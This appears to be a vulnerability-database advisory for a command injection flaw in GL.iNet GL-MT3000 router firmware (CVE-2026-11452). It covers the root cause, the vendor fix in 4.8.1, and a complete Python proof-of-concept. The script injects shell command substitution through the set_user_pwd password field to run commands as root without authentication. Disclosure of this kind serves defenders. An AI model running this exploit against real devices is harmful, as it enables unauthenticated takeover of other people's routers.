CVE-2026-11452
Description
Command injection in GL.iNet GL-MT3000 firmware up to 4.4.5 allows unauthenticated remote attackers to execute arbitrary commands as root.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Command injection in GL.iNet GL-MT3000 firmware up to 4.4.5 allows unauthenticated remote attackers to execute arbitrary commands as root.
Vulnerability
A command injection vulnerability exists in the /cgi-bin/glc endpoint of GL.iNet GL-MT3000 devices running firmware versions up to 4.4.5. The SET_USER_PWD handler within the nas-web.so plugin, specifically in the FUN_0042e200 function, is susceptible to manipulation of the Password argument. This handler constructs a shell command using snprintf and executes it via system(), allowing for command substitution when the password is not properly escaped [1].
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request to the /cgi-bin/glc endpoint. The request should include a JSON payload with the set_user_pwd method and a password argument containing shell command substitution syntax, such as $() or backticks, to execute arbitrary commands. The vulnerability is triggered when the gl_nas_sys daemon processes this request, forwarding it to the nas-web.so plugin without sufficient authentication or input validation [1].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected GL.iNet GL-MT3000 device. This could lead to a complete compromise of the device, enabling the attacker to steal sensitive information, modify system configurations, or use the device for further malicious activities [1].
Mitigation
GL.iNet has addressed this vulnerability in firmware version 4.8.1. Users are advised to upgrade their GL-MT3000 devices to version 4.8.1 or later to mitigate this risk. The vendor's testing on version 4.8.1 indicated that payloads relying on command substitution are no longer executed [1].
AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The `smbpasswd` command is constructed using `snprintf` with user-controlled input directly embedded within double quotes, allowing shell command substitution."
Attack vector
An unauthenticated attacker can send a POST request to the `/cgi-bin/glc` endpoint with a JSON payload specifying the `set_user_pwd` method. The payload includes a username and a crafted password containing shell command substitution syntax, such as `$(command)`. This payload is forwarded to the `gl_nas_sys` daemon, which then executes the `smbpasswd` command with the manipulated password, leading to arbitrary command execution as root [ref_id=1]. The vulnerability is exploitable remotely without authentication [ref_id=1].
Affected code
The vulnerability lies within the `FUN_0042e200` function in the `/cgi-bin/glc` component, specifically in how the `Password` argument is handled. The `gl_nas_sys` daemon's `SET_USER_PWD` handler, identified as `FUN_0043db80`, extracts the password and passes it through `FUN_0042e200` and `FUN_0042d340`, which ultimately constructs and executes a shell command via `system()` [ref_id=1].
What the fix does
The vendor states that upgrading to version 4.8.1 addresses the issue. The current code escapes single quotes and handles the password within a single-quote context, preventing payloads that rely on `$()` or backticks from executing. This implies that the fix likely involves more robust sanitization or a different command execution method that does not allow for shell expansion within the password parameter.
Preconditions
- authNo authentication is required to access the vulnerable endpoint [ref_id=1].
- inputThe attacker must know an existing NAS username to target [ref_id=1].
- networkThe target device must be accessible over the network.
Reproduction
```python import json, shlex, ssl, sys, time, urllib.request
TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://192.168.8.1" CMD = sys.argv[2] if len(sys.argv) > 2 else "id" NAS_USER = sys.argv[3] if len(sys.argv) > 3 else "" OUT = sys.argv[4] if len(sys.argv) > 4 else "/tmp/poc25_nas_setpwd"
ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE
def glc(method, args): body = {"object": "nas-web", "method": method, "args": args} req = urllib.request.Request( TARGET.rstrip("/") + "/cgi-bin/glc", data=json.dumps(body).encode(), headers={"Content-Type": "application/json"}, method="POST", ) resp = urllib.request.urlopen(req, timeout=10, context=ctx) return "%d %s" % (resp.status, resp.read().decode(errors="replace"))
def parse_glc_json(raw): parts = raw.split(" ", 2) if len(parts) < 3: return {} return json.loads(parts[2] or "{}")
try: print("[+] start nas service") print("[+] set_nas_ser:", glc("set_nas_ser", {"enable": 1})[:200]) print("[+] start :", glc("start", {})[:200]) time.sleep(2)
if not NAS_USER: users = parse_glc_json(glc("get_user_list", {})).get("list", []) print("[+] NAS users:", [u["name"] for u in users]) if not users: print("[-] no NAS user found, pass one as argv[3]") sys.exit(1) NAS_USER = users[-1]["name"]
command = "sh -c %s>%s 2>&1" % (shlex.quote(CMD), shlex.quote(OUT)) nonce = str(time.time_ns())[-8:] password = "Aa1!$(%s)%s" % (command, nonce)
print("[+] target :", TARGET) print("[+] nonce :", nonce) print("[+] user :", NAS_USER) print("[+] command :", CMD) print("[+] output :", OUT) print("[+] payload :", password)
raw = glc("set_user_pwd", {"name": NAS_USER, "password": password}) print("[+] response:", raw[:200])
except Exception as e: # gl_nas_sys sometimes returns HTTP 502 after the command has already run. print("[-] request failed: %s" % e) print("[!] HTTP failure does not necessarily mean exploit failed; check output file.")
print("[+] check: cat %s" % OUT) ``` [ref_id=1]
Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.